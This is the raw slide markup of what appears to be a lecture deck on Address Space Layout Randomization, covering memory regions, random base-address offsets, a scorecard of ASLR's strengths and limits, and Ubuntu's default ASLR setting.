          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815975" y="2827338"/>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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uninitialized data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Initialized data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3448050" y="2828925"/>
            <a:ext cx="2495550" cy="3205163"/>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Mapped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thread stacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shared Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6049963" y="2830513"/>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Stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="274320">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Main stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Left Brace 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1863583" y="1284289"/>
            <a:ext cx="423863" cy="242093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1" name="Left Brace 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4510739"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2" name="Left Brace 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7111064"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0489" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1008555" y="1882775"/>
            <a:ext cx="213391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Base address a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20490" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3651103" y="1882775"/>
            <a:ext cx="214313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Base address b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20491" name="TextBox 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6267809" y="1882775"/>
            <a:ext cx="211037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rPr>
              <a:t>Base address c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1243674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75" y="1744663"/>
            <a:ext cx="7789863" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF0A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506"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ASLR Randomization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21514" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="816536" y="1852613"/>
            <a:ext cx="261246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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>+ 16 bit rand r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="-25000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21515" name="TextBox 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="1854200"/>
            <a:ext cx="263064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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>+ 16 bit rand r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="-25000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21516" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="1835150"/>
            <a:ext cx="259788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mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>+ 24 bit rand r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="-25000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Left Brace 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1863583" y="1284289"/>
            <a:ext cx="423863" cy="242093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5" name="Left Brace 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4510739"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6" name="Left Brace 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7111064" y="1283354"/>
            <a:ext cx="423863" cy="2422808"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="8E28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0" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815975" y="2827338"/>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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uninitialized data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Initialized data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3448050" y="2828925"/>
            <a:ext cx="2495550" cy="3205163"/>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Mapped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thread stacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shared Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6049963" y="2830513"/>
            <a:ext cx="2495550" cy="3205162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E47932"/>
          </a:solidFill>
          <a:ln w="28575" cmpd="sng">
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="274320">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Main stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279400" y="6308209"/>
            <a:ext cx="7659043" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>*  ≈ 16 bit random number of 32-bit system. More on 64-bit systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3871295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ASLR Scorecard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7977312"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1737361"/>
          <a:ext cx="8229600" cy="3688080"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{FABFCF23-3B69-468F-B69F-88F6DE6A72F2}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2438400"/>
                <a:gridCol w="5791200"/>
              </a:tblGrid>
              <a:tr h="429497">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Aspect</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Address Space Layout</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Randomization</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="429497">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Performance</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>excellent—randomize once at load time</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="1059426">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Deployment</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>turn on kernel support</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>(Windows:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>opt-in</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> per module, but system override exists)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>no recompilation necessary</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="773095">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Compatibility</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>transparent to safe apps</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>(position independent)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="676524">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Safety Guarantee</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="342900" indent="-342900">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" i="0" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>not good </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" i="0" baseline="0" smtClean="0"/>
                        <a:t>on x32, much better on x64</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" i="0" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" indent="-342900">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" i="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>code injection may not be necessary…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3061105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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Ubuntu - ASLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18434" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ASLR is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>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by default </a:t>
            </a:r>
